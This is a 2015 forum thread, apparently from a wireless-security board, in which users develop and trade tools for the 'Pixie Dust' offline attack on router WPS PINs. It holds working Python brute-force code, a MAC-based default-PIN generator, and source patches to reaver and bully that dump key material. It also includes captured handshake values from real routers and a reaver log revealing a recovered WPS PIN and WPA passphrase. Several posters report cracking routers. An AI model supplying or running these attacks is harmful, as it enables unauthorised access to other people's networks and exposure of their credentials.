"For 8-digit numeric PINs, the last digit in the PIN is used as a checksum of the other digits. This has the disadvantage of reducing the entropy of the PIN. It has the advantage, however, of enabling errors in user input of the PIN to be detected and potentially corrected before the PIN is actually used in the Registration Protocol. Users of course are not expected to compute checksums for passwords they choose, so user-specified Device Passwords do not include a checksum digit."

"Checksum digits are only included and validated for the Default (PIN) device password type, and only if an 8-digit PIN is used."

You may be right but of course, vendors do what they want... we know. I saw PINs that didn't match the checksum too. I'll add the checksum optimization soon.


People says english is easy but they are wrong, or it is because they don not mind to speak with faults or imprecisly.
English IS difficult, a new language is. That's why Esperanto was invented :) By the way, I'm a non-native speaker. I learned english (mostly) on the Internet so my speaking could be a bit misleading sometimes.

casperass
2015-03-21, 00:20
@wiire, So when will be able to try your tool? Can you send your e-mail with p.m? Thanks :)

wiire
2015-03-21, 11:18
@wiire, So when will be able to try your tool? Can you send your e-mail with p.m? Thanks :)
Soon hopefully. I'm kinda busy at the moment. I'll host the code on GitHub and make a new thread with tutorial when completed or available for "beta testing". Let's stick to the subject's thread for now. If someone has information or suggestions on the PNRG attack, please share.

kcdtv
2015-03-21, 23:37
You may be right but of course, vendors do what they want... we know. I saw PINs that didn't match the checksum too. I'll add the checksum optimization soon.

I just know one case of a router model that has a default PIN that doesn't respect the checksum rule , it was used by telefonica (spanish ISP) and it is the "Amper" ASL-26555
otherwise i always saw default PIN that respect the checksum rules
for the checksum if you need any help i can explain you every step in details.
this is the ZaoChunsheng C code called ComputePIN and at the end you can see the function he uses to generate the checksum with a while loop

#include <stdio.h>
#include <stdlib.h></code>

int main()
{

unsigned int wps_pin_checksum(unsigned int pin);
int PIN = 0;

printf("ComputePIN-C83A35\n");
printf("Description:\n");
printf("If your wireless router MAC address start with \"C83A35\",\n");
printf("type the other six digits, you might be able to get the \n");
printf("WPS-PIN of this equipment, please have a try, good luck!\n\n");
printf("Code by ZhaoChunsheng 04/07/2012 http://iBeini.com\n\n");
printf("Input MAC Address(HEX):c83a35");
scanf("%x",&PIN);
printf("MAC Address(HEX) is: C83A35%X\n",PIN);
printf("WPS PIN is: %07d%d\n",PIN%10000000,wps_pin_checksum(PIN%10000000));

return 0;
}

unsigned int wps_pin_checksum(unsigned int pin)
{
unsigned int accum = 0;
while (pin)
{
accum += 3 * (pin % 10);
pin /= 10;
accum += pin % 10;
pin /= 10;
}

return (10 - accum % 10) % 10;
}



If someone has information or suggestions on the PNRG attack, please share.
This PDF is VERY interesting : it is realiy focused on brute force issues vs Diffie-Hellman
Exploring Diffie-Hellman Encryption (http://www.linuxjournal.com/article/6131)

soxrok2212
2015-03-22, 19:33
Anyone who has an XFINITY gateway... what are your model numbers? Seems like Comcast might have a HUGE problem to deal with soon...

Alvarote98
2015-03-22, 23:23
@soxrok2212
Thank you for the explaination. I'll be sure to study the subject thoroughly when I'll have a bit more time. I'm a bit busy at them moment :D

Anyway, while we're waiting for someone able to modifiy reaver/bully, I've made a little program.

For now it just tries to bruteforce the PIN going throught all 20'000 combination (it doesn't use the checksum for now), assuming ES1 = ES2 = 0. Just feed it all the things needed:
- PKe
- PKr
- AuthKey
- E-Hash1
- E-Hash2

Tried on a TP-LINK (Ralink) and it just works. :D Bongard was right.

<link removed>

Here's a sample image:
http://i.imgur.com/bmXLjdD.png (http://imgur.com/bmXLjdD)

EDIT: added the image properly. Removed link.

Can u post a mirror of the link?
Thanks

Alvarote98
2015-03-22, 23:25
Can u post a mirror of the link?
Thanks

datahead
2015-03-23, 03:06
code removed

datahead
2015-03-23, 03:07
code removed

wn722
2015-03-23, 11:13
hey can anyone share the method of extracting
PKe
- PKr
- AuthKey
- E-Hash1
- E-Hash2

from cap files?

kcdtv
2015-03-23, 13:57
@ dathead
i dindn't learnt C or cryptologie (or maths) this week-end so I don't really get the details... (at all)
If i undesrtand well vendors uses may have used this "random function" :
http://opencores.org/ocsvn/openrisc/openrisc/trunk/rtos/ecos-3.0/packages/language/c/libc/stdlib/current/src/rand.cxx
thank you for sharing your code , great job :)

dudux
2015-03-23, 17:27
Hi Guys,

I have coded the Pixie Dust Attack just when ES1=ES2=0 for Ralink devices. I have used the C code as test vector for the input data.
You can find it here : https://bitbucket.org/dudux/wpsoffline/


import hashlib, hmac

PK_E = "11e11709c0836c10e5a93a415f7869c5351f7218ab68867c3a 1f8dbb9b8f984c"\
"e0eabcbfd212fdc04fd9b3675e9dd9578d53ed5904177bdbe4 fe64008a4a47de"\
"50e7fc6409dc750b295565f54f1fe78582d78de0fac7267567 7cb1c85c5ca46a"\
"5fced284ad79a27b4c38038b207ee76d3d556d7c3606310e52 f5c6123a1f4997"\
"6566cc21c31d40e5412decb2712d07667ac0803b21ca1df15f 8f25814dc313cf"\
"7bcdffeac436b5f2d40ceb18df5d90ac1e545eddd43ec7e78d 4970d313a65746".decode("hex")

PK_R = "531ff143e7ef3663de555704904fbe5417a2b465f175cf55e0 1ab94cff9156d3"\
"b6c272d1315fa70c4719897cea28f984ba0eccf22e86f48d4f 8a275fcc78e37a"\
"b81e917a376e038595ab980d57898224aed228052f29efa629 9f11cd4d7aa562"\
"b7baf1404ae8a15b70c130718cb1e0db6a32af3be2eb073927 ef414ea2fd5ced"\
"6595a95c5e28fa3badf69ddb15f9f74deb1690139122eab14f 99adc9d360f7d4"\
"f066fab35b77a46eb7286172eae8dd7eda768849307f9b00f0 6d69571b9da243".decode("hex")

eHash1 = "c14b83a3415999bba082f467872fd4bc9b79778b33d1d20cab 55cb7d0b96cf43".decode("hex")
eHash2 = "3516ace7cd46bcbcac83b3065be66a89186a54da8800d33604 1e8ab847929416".decode("hex")
AuthKey = "d5c7e4a9fb5911b31dcbf80db712b34ed71a9218c9c111992c 60d883e197e9ea".decode("hex")

# if ES1,ES2 are found out, recover the halves of PIN
second_half = first_half = 0
es1 = es2 = '\00' * 16 # (str(es2).zfill(32)).decode('hex')
for first_half in xrange(10000):
PSK1_guess = hmac.new(AuthKey, (str(first_half)).zfill(4), hashlib.sha256).digest()[:16]
eHash1_guess = hmac.new(AuthKey, es1 + PSK1_guess + PK_E + PK_R, hashlib.sha256).digest()
if (eHash1 == eHash1_guess): #First half done
for second_half in xrange(10000):
PSK2_guess = hmac.new(AuthKey, (str(second_half)).zfill(4), hashlib.sha256).digest()[:16]
eHash2_guess = hmac.new(AuthKey, es2 + PSK2_guess + PK_E + PK_R, hashlib.sha256).digest()
if (eHash2 == eHash2_guess):
print "PIN FOUND! %04d%04d" %(first_half,second_half)
# doWPSprotocolWithPINguessed() #TODO
exit()


I am running out of time, but I would like to implement the bruteforce for the PRNG state for Broadcoms. After all, I would like to translate it to C into Reaver or bully. But surely someone is better C programmer and got more time than me.

Proost!

dudux
2015-03-24, 17:48
I forgot to say that: "I blindly implemented the attack in the proof-of-concept of "wpscrack.py". It is only useful for Ralink's devices as TPLINKS routers.
I have not tested the attack in live! This code does the right offline bruteforcing. However, IT HAS NOT BEEN TESTED YET! Feel free to tweak it as you wish or do commit requests.

Usage:

wpscrack_mod:$ sudo python wpscrack.py -i mon0 -b [BSSID] -s [ESSID] --offline -vv

soxrok2212
2015-03-24, 19:54
Updated with a database in the original post :D

casperass
2015-03-24, 21:49
dudux, It say all the time "PIN FOUND! 57334196" for every routers.

FurqanHanif
2015-03-25, 04:15
Still Attack not available for BroadCom :confused: ..

Lisa Chu
2015-03-25, 11:50
dudux, It say all the time "PIN FOUND! 57334196" for every routers.
You need to edit the file and put your own data. I dont know where PKR,PKE data is in the packets, thats where im stuck.

Tryed the tool and is giving me

Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!! But im trying against Broadcom and not Ralink, as said above Broadcom is not implemented yet.

I hope guys keep developing this subject, its very interesting but over my personal understanding to put in practice, so ill have to wait.
Would it be feasible to add a import from cap feature? i guess that would put some testers running. Thanks everyone

soxrok2212
2015-03-25, 13:15
@everyone There is NO official and complete tool available yet. Stop asking. When it is available, one of us will make a post.

aanarchyy
2015-03-25, 16:25
@dudux was the realtek.cap file what you used to make wpsOffline.py? Unless im doing it wrong, Im not getting the same pke, pkr, or any of it.

soxrok2212
2015-03-25, 20:13
SMCD3GNV and WRT160Nv2 confirmed vulnerable!

N4 Nethunter
2015-03-25, 20:23
the tool works i have corrected the code now
@sorox2212

cracked 3 routers
and all of them were right :D

soxrok2212
2015-03-25, 20:36
Can you post the model numbers, manufacturers, and hardware numbers so I can add it to the database?

soxrok2212
2015-03-26, 00:56
Dudu has asked me to post a python implementation for Ralink devices! You can get it here: https://bitbucket.org/dudux/wpsoffline/src/c1217beada95bc090cb57a042daca956a9ae4433/wpsOffline.py?at=master

All credits go to dudu! Look at the help section for the arguments. Good luck an post any successes with models here! Thanks!!!!

aanarchyy
2015-03-26, 14:25
You need to edit the file and put your own data. I dont know where PKR,PKE data is in the packets, thats where im stuck.

Tryed the tool and is giving me

Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!! But im trying against Broadcom and not Ralink, as said above Broadcom is not implemented yet.

I hope guys keep developing this subject, its very interesting but over my personal understanding to put in practice, so ill have to wait.
Would it be feasible to add a import from cap feature? i guess that would put some testers running. Thanks everyone

Tried the tool also and it is only giving the same results, but i am trying against an ralink tplink router. Unmodified code does the same.
Looking through the wireshark logs, it is attempting to authenticate, but the script isn't recognizing it is getting a response, I don't really
know enough about python to dig into it, more of a perl guy than python. Starting to learn it though. Trying to extract the part in wpscrack.py
that creates the authkey and feed it what it wants to spit out the authkey, if that's even going to work... From what I am reading about the
KDK it only partialy makes sense to me.

Tried the modified version of bully also, just seems to run normaly, trying pins and moving on to the next. Still confused on how this is
supposed to give the Authkey, which is where I am stuck. I assume it doesn't give it to you automatically, so how do you get it to give
the authkey?

I can get everything else as it's in plain sight. I have a couple ralink routers at my disposal to test this on also.


maingroup.add_argument('-ak', '--AuthKey', type=str, nargs='?', help='AuthKey obtained from wireshark')
I thought it wasn't obtained from wireshark and you had to run it through the KDK... That just confused me even more...

soxrok2212
2015-03-26, 21:17
WPSCrack.py I guess only works with Atheros wireless adapters. Try this to get more info.. comes from Hack Forums:



int wpa_debug_level = MSG_INFO; // change it to MSG_DEBUG

2: Or, manually add some prints in the (wpa_supplicant) source. Let's take as an example bully (you could try reaver if you wish):
- Download the zip file. Unzip it.
- Go to bully-master/src/wps and open wps_common.c with a text editor.
- Go to line 122 and add something similar (just a print):
Code:
os_memcpy(wps->emsk, keys + WPS_AUTHKEY_LEN + WPS_KEYWRAPKEY_LEN,
WPS_EMSK_LEN);

/****** ADD THIS PART ******/
printf(" > AuthKey: ");
int pixiecnt = 0;
for (; pixiecnt < WPS_AUTHKEY_LEN; pixiecnt++) {
printf("%02x", *(wps->authkey + pixiecnt));
if (pixiecnt != WPS_AUTHKEY_LEN - 1) {
printf(":");
}
}
printf("\n");
/******/

wpa_hexdump_key(MSG_DEBUG, "WPS: AuthKey",

- Now open wps_registrar.c.
- Go to line 1719 (inside wps_process_e_hash1 function) and add:
Code:
wpa_hexdump(MSG_DEBUG, "WPS: E-Hash1", wps->peer_hash1, WPS_HASH_LEN);

/****** ADD THIS PART ******/
printf(" > E-Hash1: ");
int pixiecnt = 0;
for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) {
printf("%02x", *(wps->peer_hash1 + pixiecnt));
if (pixiecnt != WPS_HASH_LEN - 1) {
printf(":");
}
}
printf("\n");
/******/

return 0;

- Then in the function below (inside wps_process_e_hash2) add:
Code:
wpa_hexdump(MSG_DEBUG, "WPS: E-Hash2", wps->peer_hash2, WPS_HASH_LEN);

/****** ADD THIS PART ******/
printf(" > E-Hash2: ");
int pixiecnt = 0;
for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) {
printf("%02x", *(wps->peer_hash2 + pixiecnt));
if (pixiecnt != WPS_HASH_LEN - 1) {
printf(":");
}
}
printf("\n");
/******/

return 0;


Then please post this here:



AP Manufacturer:
Model name/number:
Chipset:

N1 Nonce:
Authkey:
PKE:
PKR:
E-Hash1:
E:Hash2:


First 3 are optional, last 6 are mandatory to crack.

dudux
2015-03-26, 22:30
Yeah authkey is generated, sorry I just copied&pasted.........

The code is right here. I guess that the community will release a fresh & quick patch for reaver or bully. Be patient and try to understand the flaw itself! ;)


def gen_keys(self):
pubkey_enrollee = self.bignum_unpack(self.PK_E)
pubkey_registrar = pow(2, self.secret_number, self.prime_int)
shared_key = self.bignum_pack(pow(pubkey_enrollee, self.secret_number, self.prime_int), 192)

self.PK_R = self.bignum_pack(pubkey_registrar, 192)
self.RNonce = os.urandom(16)
DHKey = hashlib.sha256(shared_key).digest()
KDK = hmac.new(DHKey, self.ENonce + self.EnrolleeMAC + self.RNonce, hashlib.sha256).digest()
self.AuthKey, self.KeyWrapKey, self.EMSK = self.kdf(KDK, 'Wi-Fi Easy and Secure Key Derivation', [256, 128, 256])

self.R_S1 = '\00' * 16 #random enough
self.R_S2 = '\00' * 16

self.PSK1 = hmac.new(self.AuthKey, self.pin[0:4], hashlib.sha256).digest()[:16]
self.PSK2 = hmac.new(self.AuthKey, self.pin[4:8], hashlib.sha256).digest()[:16]
self.RHash1 = hmac.new(self.AuthKey, self.R_S1 + self.PSK1 + self.PK_E + self.PK_R, hashlib.sha256).digest()
self.RHash2 = hmac.new(self.AuthKey, self.R_S2 + self.PSK2 + self.PK_E + self.PK_R, hashlib.sha256).digest()

h4x0rm1k3
2015-03-27, 04:31
Thanks for the script Dudux, worked for me on a belkin F5D8236-4 v3.

dudux
2015-03-27, 11:56
@h4x0rm1k3: which script did you use?

FurqanHanif
2015-03-28, 06:05
Well Explained Pixie Dust Attack in This Document...
http://www.fileconvoy.com/dfl.php?id=g6f28e6fa7f5e39db99964238778611e6156c29 08c

kcdtv
2015-03-28, 10:14
Realy? :D
....Did you read the first post of this thread? ;)

WPSCrack.py I guess only works with Atheros wireless adapters
Exactly: wpscrack doesn't works with USB adapaters (althought i didjn't try with "the" chipset USB atheros - ah9k_htc )
It is according to me the worst and least interesting option ( compared to reaver or buly)
cheers ;)

aanarchyy
2015-03-28, 21:29
Confirmed to work with TG862 v5

PK_E = "1fa58df039d88bd13c4fce5dddf90dc5062f33f3d853e1675c 793c5c0039102c3a9c82041e366f3e7fef39d050340bb134ce 4c0c628657ecf48bb64bfea172409b21dfb760ab2c0b41d557 7860c99a8625f06a8dc7e20c866c1656f1e94b37873e80b137 a33b265149574a3a55183a6665d9ade3bce174a2f2e24c3bba 1f6d53adaf75d8d966952772decbb776aeb43a7b1291f3f4e5 7572ffccd16ee81f74fc05f257fc1a7d98bdc8e31e81653119 cf0f2f20db1744c3b503be7e8f11975148"

PK_R = "84bda17b3566d94551e34222eb01f1302bd3f57efddd8facdd b14e2ddeddd616794e51a99e084d6c0f90bfea1fce7bdb7ce0 951c04820a39685117ce9f4c54111d48c69318e9269ed4a4d7 7112b34418825517a9a772ddb448278ec849ec7177fcb8a925 ba1ce34579a712af5e964a8394ef09c38bc34878ee965cbaa8 90cf0bf3a2500dd455193cf8d0443a65fdebb2312cae514968 bf4090423795860fa5b419ff61f37ef25d2af364fabec0da54 7241e794e1b2ca7562aec072bcd76b9218
eHash1 = "991ea46545f722945b7e356f58549264773a2d08b39129ee43 ba818518044842"
eHash2 = "e2b5ca0c9534d1dceb41327000d5e00ce973c27071726088b8 b4c89d3c7ba487"
AuthKey = "cbaa229e34bb288167c3412e5c9c32478a897e16cce47b8e3c 4de9ef4eb2fcdb"

Trying to find a bit more automation in this, because what i have to do now to get it to work is kind of a pain...

wn722
2015-03-29, 10:40
Trying to find a bit more automation in this, because what i have to do now to get it to work is kind of a pain...

can you write that down?
i'd like to give it a go as well
cheers.

mmusket33
2015-03-29, 10:57
Musket Teams have done the rewrite of bully as suggested in a thread above. One computer seems to provide all five keys, another computer only provides the keys -authkey hash1 and hash2 and only if the -o command is in the bully command line(ie write to file). It then appears on the screen not in the file. In this case you must also run wireshark to get the -pke and -pkr

You must download the source file rewrite the two files in the install package then reinstall. If during reinstall you get a pcap.h warning then:

sudo apt-get install libpcap-dev

Then reinstall. Method for reinstall is found in the README.md

If you are trying to rewrite reaver - (our team is working on this as we speak) note that the wps_common.c file works for both reaver and bully BUT the wps_registrar.c is different. You must rewrite each version of wps_registrar.c. The same command lines to change exist - but the reaver file has file links not found in bully causing the install to fail if the bully version is used.

MTeams

soxrok2212
2015-03-29, 11:42
Confirmed to work with TG862 v5

Did you actually test the pin with reaver/bully and find the WPA key? There has been an issue reported where TG862 tests report a false positive... I tested your data and got the same pin 42000648 as someone else who tested that same model.

aanarchyy
2015-03-29, 16:03
@soxrok2212 yes I did test the pin and it did work. Oddly enough I seem to be getting the same pin for multiple routers. The ones that have the default essid of HOME-XXXX all seem to be producing the same pin. I've only tested it on that one so far. Could xfinity have given the same pin to all the tg862 routers? That would be a MAJOR oops!

aanarchyy
2015-03-29, 16:49
Just checked the configuration of the router and the pin DOES NOT match. The pin in the configuration was 84237446

516

But attempting 42000648 does indeed work!


root@kali:~/Desktop# reaver -b 00:AC:E0:3E:DB:10 -vv -i mon0 -p 42000648

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 00:AC:E0:3E:DB:10
[+] Switching mon0 to channel 6
[+] Associated with 00:AC:E0:3E:DB:10 (ESSID: HOME-XXXX)
[+] Trying pin 42000648
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 9 seconds
[+] WPS PIN: '42000648'
[+] WPA PSK: 'basket1744chase'
[+] AP SSID: 'HOME-XXXX'
[+] Nothing done, nothing to save.

But attempting the pin in the configuration doesn't work. And unless i am looking at this wrong, in the screenshot above, isn't wps pin entry diabled?

soxrok2212
2015-03-29, 17:12
I'm glad you tested it ;) however, that is extremely weird. Perhaps Comcast uses this same undiscovered pin (until now) on all their TG862 models...?

cyber.tao.flow
2015-03-29, 19:01
I just had this same thing happen with a TG862

M1 wps.enrollee_nonce : bd2fb84d8cd392268432a86692f45081
M1 wps.public_key : 26523c5c10fbecb8dacebd499b943381dd5d959a19b0dd3de6 d6092296be009f6d0043e0d0468b6169640a42c2a755451d6a a21c0c9fa581868ffc39cb9b9dd61f75f2d1b37b10724fe526 3f2f0ef51d447a37c04d3634b3cadb864209b6288276daa193 10c1414162af40da6d5cf524791ce746fb4e6bb044fe531683 a4f57cd4e864a4beb6b9e397c10f1b2673306ef6ccb81e8cff 0086cbbddb546d2e33a4ce02f305d36f1a6d3e6a075dace5e4 54a7b7fc41b9df1a4739b67c071da0b4ba
M2 wps.enrollee_nonce : bd2fb84d8cd392268432a86692f45081
M2 wps.public_key : 1c5abc81aa3b2e019322275d81fdba8d781a670c7bbb2e72f1 41b9559fba622f1d664a2d088f3d86aec4ac054d8fe32afa61 5c44641e0b87736f5f533edbf4c2c170d38fab28aaadecb812 687b1d69f5314179c1b8c71d5f6302788a112826cb2e359703 d4039a9ee4c2c7d8f3cc2174db2738f67cc64677111d995680 42d38748fd0963cabda0ee6c2eb911d428647b9401df6d4ac7 5e7c9d57ddcf914bcf18f9dd138b3a09726b5c906f6a539cbe cab2fc2acd415168e424d4cd45db6f8008
M2 wps.registrar_nonce : bdb64e739ce8e78915d839945a6a4882
M2 wps.authenticator : 25706c21a1637948
M3 wps.registrar_nonce : bdb64e739ce8e78915d839945a6a4882
M3 wps.authenticator : 8c8ac40a5d2fba7c
M3 wps.e_hash1 : 40d578a860d7c7b7fa9164734821be696de11dde1026b62e58 6027685d44bda6
M3 wps.e_hash2 : 47f0d473cbb32fee2ebe20ce4f151c15a17d6b7695fa536ed7 779369de8e6a81
M4 wps.enrollee_nonce : bd2fb84d8cd392268432a86692f45081
M4 wps.authenticator : d1a7f72e8569b045
M4 wps.encrypted_settings : 97e680a1c5c31d6ff777219bb0f1928cdbc056f38f894530cf f61b317343cd599b2a3501a7defe012fcab40097efa202e927 7d5605bfa84e62be20b985db5797
M4 wps.r_hash1 : a9def4675aa789fe6f6d1cbb2e5a428184690698a6a65f9a80 05c147b5cd73a1
M4 wps.r_hash2 : 2b84cb17f955b22fe165c4bfa2b81a0d41ae7681960269063f c7e11fd48660dc


Client wps.manufacturer :
Client wps.device_name :
Client wps.os_version : 2147483648
Client wlan.ta : 00:19:e3:06:7e:44
Client wps.model_name :
Client wps.model_number :
Client wps.serial_number :
AP wps.manufacturer : ARRIS
AP wps.device_name : ARRIS TG862 Router
AP wps.os_version : 2147483648
AP wlan.ta : 00:1d:d6:ab:8f:40
AP wps.model_name : TG862G
AP wps.model_number : RT2860
AP wps.serial_number : 12345678

Adittionaly it appears to receive the creds then fail the WPS ?

<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
<3>Trying to associate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
<3>Associated with 00:1d:d6:REDACTED
<3>CTRL-EVENT-EAP-STARTED EAP authentication started
<3>CTRL-EVENT-EAP-PROPOSED-METHOD vendor=14122 method=1
<3>CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected
<3>WPS-CRED-RECEIVED 100e003c102600010110450009484f4d452d38463432100300 020022100f0002000c10270010314443384538303932413943 3030343110200006001dd6ab8f40
<3>WPS-FAIL msg=11 config_error=0
<3>CTRL-EVENT-EAP-FAILURE EAP authentication failed
<3>WPS-FAIL
<3>CTRL-EVENT-DISCONNECTED bssid=00:00:00:00:00:00 reason=3
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
<3>Trying to associate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
<3>Associated with 00:1d:d6:REDACTED
<3>WPA: Key negotiation completed with 00:1d:d6:REDACTED [PTK=CCMP GTK=TKIP]
<3>CTRL-EVENT-CONNECTED - Connection to 00:1d:d6:REDACTED completed (reauth) [id=11 id_str=]
<3>CTRL-EVENT-DISCONNECTED bssid=00:1d:d6:REDACTED reason=4
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2437 MHz)
<3>Trying to associate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2437 MHz)
<3>Associated with 00:1d:d6:REDACTED
<3>CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully (based on lower layer success)
<3>WPA: Key negotiation completed with 00:1d:d6:REDACTED [PTK=CCMP GTK=TKIP]
<3>CTRL-EVENT-CONNECTED - Connection to 00:1d:d6:REDACTED completed (reauth) [id=11 id_str=]




Just checked the configuration of the router and the pin DOES NOT match. The pin in the configuration was 84237446

516

But attempting 42000648 does indeed work!


root@kali:~/Desktop# reaver -b 00:AC:E0:3E:DB:10 -vv -i mon0 -p 42000648

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 00:AC:E0:3E:DB:10
[+] Switching mon0 to channel 6
[+] Associated with 00:AC:E0:3E:DB:10 (ESSID: HOME-XXXX)
[+] Trying pin 42000648
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 9 seconds
[+] WPS PIN: '42000648'
[+] WPA PSK: 'basket1744chase'
[+] AP SSID: 'HOME-XXXX'
[+] Nothing done, nothing to save.

But attempting the pin in the configuration doesn't work. And unless i am looking at this wrong, in the screenshot above, isn't wps pin entry diabled?

wn722
2015-03-29, 19:14
Musket Teams have done the rewrite of bully as suggested in a thread above.
MTeams
hey. where exactly is that link?
in first post of this topic or there's another topic?

aanarchyy
2015-03-30, 00:57
I'm glad you tested it ;) however, that is extremely weird. Perhaps Comcast uses this same undiscovered pin (until now) on all their TG862 models...?

Other HOME-XXXX networks I have tested did produce a different pin. But I was unable to verify the pins as the wps process on the router crashed (?), I will try and verify the pins on those later.
But two of the HOME-XXXX(Arris routers) networks I tested produced the same pin, only one verified.

I was thinking more like, if wps is disabled in the settings, it doesn't actually disable, instead it just changes to the default pin of 42000648. Anyone else confirm?

soxrok2212
2015-03-30, 01:04
Well someone else from Hack Forums reported the same exact issue and returned the same exact pins but thought they were just found in error so he didn't try them. He will try them in the next few days though...

Also, comcast uses a few different gateways as well (SMC for example, which is also ralink and vulnerable), so maybe that is why you got different pins.

mmusket33
2015-03-30, 01:07
To wn722

See thread #78 above posted by Soxrok2212

Any problems write here and we will talk you thru the process. Our problem is confirming the -pke -pkr. Any commentary would be helpful.

MTeams

soxrok2212
2015-03-30, 01:09
To wn722

See thread #78 above posted by Soxrok2212

Any problems write here and we will talk you thru the process. Our problem is confirming the -pke -pkr. Any commentary would be helpful.

MTeams

As of now, PKE and PKR can be found in wireshark in M1 and M2 packets... I haven't been able to find where they are debugged in reaver's source. Still looking into it.

h4x0rm1k3
2015-03-30, 01:17
Dudux, I used the 1 pasted by soxrok that you asked him to post on bitbucket. This one - https://bitbucket.org/dudux/wpsoffline/src/c1217beada95bc090cb57a042daca956a9ae4433/wpsOffline.py?at=master

@h4x0rm1k3: which script did you use?

aanarchyy
2015-03-30, 02:24
As of now, PKE and PKR can be found in wireshark in M1 and M2 packets... I haven't been able to find where they are debugged in reaver's source. Still looking into it.
I've been digging through the source of bully/reaver also looking for where they are parsed also, so far nothing but dead ends, though I don't really know c very well either. Digging around where it mentions pubkey seems to be around where it would be though. Bear with me here, picking it up as I go. :-)

Hopefully something we can feed a pcap through to give all the required info, derive the pin, and if successful spawn reaver/bully to test and retrieve the psk. Though a live solution would be better ie a patch to bully/reaver.

soxrok2212
2015-03-30, 02:55
Datahead and I began digging into Netgear router's source and found some interesting bits of information. We think that we might have found how the actually pin is generated... Simply with a defined rand() function. It looks as if it uses the dev password (which can be found in the M1 packet in a WPS transaction) and has something to do with the system time. We are looking for help from crypto people who know what they are doing. It's looks promising, the same thing was found in 2/2 checked source codes so far: WNDR3400v2 and R6300v1.

kcdtv
2015-03-30, 10:45
Very interisting what you say about netgear... are you talking about cg3100 series?
And... *** with the Router with 2 PIN enabled? How did they manage that :D .... Incredible...
Very good work guys, it is impressing :)

SubZero5
2015-03-30, 10:54
I believe when the PIN is enabled, the pin on the back is active but when it is disabled, that stated PIN is enabled. Any thoughts on this?

wn722
2015-03-30, 23:16
copy.
How do you guys get the keys out of pcap file?
just use wireshark?

soxrok2212
2015-03-31, 00:24
I believe when the PIN is enabled, the pin on the back is active but when it is disabled, that stated PIN is enabled. Any thoughts on this?

No, they actually both work at the same time. It seems to just be a secret pin... :D


copy.
How do you guys get the keys out of pcap file?
just use wireshark?

Well everything but the Authkey can be found in wireshark. You can download the modified version of reaver that prints the Authkey, Enrollee Nonce, E-Hash1 and E-Hash2 here. (https://www.dropbox.com/sh/rvw5efhpigg3beh/AABo_r6bFuejb7JEN05bxGH3a?dl=0) The rest you need to find in a cap file/wireshark. -This was made following wiire's advice from a previous post!


The PKE and PKR (Public Keys) are in the M1 and M2 messages. The M1 contains "Public Key" which is the PKE and the M2 also contains a "Public Key" but this key is different... aka the PKR. (Just right click and copy the values)

If you can give me all this data, that would help A LOT in testing. Print it just like this:



N1 Enrollee Nonce:
Authkey:
PKE:
PKR:
E-Hash1:
E-Hash2:


And optional (but very helpful) information:


Manufacturer:
Model Number:
Hardware Version:


All you have to do is:


cd /path/to/reaver-wps-fork/src
./configure
make
make install


Then you should be good to find data :D

mmusket33
2015-03-31, 02:02
Install matters for reaver download

Go to the src folder

To avoid a file permission error type

chmod 755 configure

then

./configure

make

make install


If you get the following error

checking for pcap_open_live in -

lpcap... no
error: pcap library not found!

Then install these two(2) files:


sudo apt-get install libpcap-dev

sudo apt-get install libsqlite3-dev


then

./configure

make

make install

Program ran fine after this

Great Stuff Soxrox2212!!!

psicomantis
2015-03-31, 02:46
Havent had a chance to test the PIN, but here is what I got.


Arris - DG1670AB2

N1 Enrollee Nonce: 5b:21:6e:79:7f:3d:76:ff:b0:d7:90:69:33:bc:d3:d7
Authkey: 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa :d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c
